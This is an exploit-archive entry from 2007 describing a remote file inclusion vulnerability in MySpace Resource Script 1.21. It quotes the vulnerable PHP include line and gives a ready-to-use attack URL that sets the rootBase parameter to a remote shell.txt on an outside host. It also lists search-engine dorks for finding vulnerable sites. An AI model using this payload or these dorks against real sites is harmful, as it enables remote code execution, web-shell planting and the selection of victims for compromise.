[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MySpace Resource Script (MSRS) 1.21 RFI Vulnerability
# Published : 2007-10-29
# Author : r00t@zapak.com
# Previous Title : PHP-AGTC membership system 1.1a Remote Add Admin Exploit
# Next Title : ProfileCMS 1.0 Remote File Upload Vulnerability Shell Upload Exploit
MSRS v.1.21 Remote File Inclusion
Author Site : http://www.myspacepros.com/
POC :
/_theme/breadcrumb.php Line No. 3
<?php include($rootBase . '/_inc/breadcrumb.php'); ?>
Usage : http://site.com/_theme/breadcrumb.php?rootBase=http://domain.com/shell.txt?
D0rks :
inurl:/Generators/Layout_Generator
"!new Female Celebrities"
inurl:/Generators/Scrollbar_Colors
# www.Syue.com [2007-10-29]